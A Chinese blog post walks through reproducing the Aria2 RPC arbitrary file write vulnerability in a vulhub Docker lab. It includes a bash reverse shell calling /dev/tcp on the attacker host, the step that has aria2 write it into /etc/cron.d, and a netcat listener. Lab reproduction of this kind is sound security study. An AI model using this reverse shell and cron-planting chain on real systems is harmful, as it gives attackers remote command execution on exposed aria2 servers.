Aria2 Arbitrary File Write Vulnerability

简介

        Aria2 是一款轻量级、多协议、多源下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内置 XML-RPC 和 JSON-RPC 接口。

        我们可以使用RPC接口操作aria2,将文件下载到任意目录,造成任意文件写入漏洞。

前期准备

靶机:192.168.0.128
攻击机:192.168.0.129

漏洞复现

1.启动靶机

cd Desktop/vulhub/aria2/rce
docker-compose build
docker-compose up -d 

2.测试环境

输入http://yourip:6680,页面空白

打开burp抓包,发现404错误

3.配置第三方UI

网址:http://binux.github.io/yaaw/demo/

点击小扳手,添加信息,bassdir在保存后会自动显现

4.编写shell

#! /bin/bash
/bin/bash -i >& /dev/tcp/192.168.0.129:12345 0>&1

启动python3搭建一个服务器

访问一下shell,可以看到写好的文件

5.编写cron.d

点击add,在目录dir下填写要下载的位置

此时,arai2会将恶意文件shell下载到/etc/cron.d/目录中,文件名为shell2

6.手动监听

在攻击机中输入nc -lvvp port

然后在靶机中先查看容器id,然后进入容器,查看/etc/cron.d

此时可以直接输入.shell2,但是可能会有权限不够的问题,首先给shell2加权限,再输入.shell2

如上所述,监听成功

  • 7
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值